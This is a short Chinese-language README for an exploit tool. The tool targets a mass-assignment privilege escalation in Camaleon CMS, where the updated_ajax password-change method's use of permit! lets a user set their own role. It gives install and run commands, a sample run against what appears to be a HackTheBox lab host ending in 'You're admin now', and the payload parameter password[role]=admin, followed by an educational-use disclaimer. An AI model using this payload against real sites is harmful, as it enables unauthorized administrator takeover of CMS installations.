Camaleon CMS 存在通过批量赋值导致的权限提升漏洞
Camaleon CMS 中存在一个通过批量赋值导致的权限提升漏洞
当用户希望更改密码时,会调用 UsersController 的 'updated_ajax' 方法。该漏洞源于使用了危险的 permit! 方法,该方法允许所有参数通过而不进行任何过滤。
pip install requests beautifulsoup4
python exploit.py --url http://target.com -u username -p password
--url - 易受攻击应用的基 URL-u - 用于认证的用户名-p - 用于认证的密码python exploit.py --url http://facts.htb -u krrish -p krrish
输出:
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now
password[role]=admin 参数此工具仅用于教育和授权的安全测试。未经授权访问计算机系统是非法的。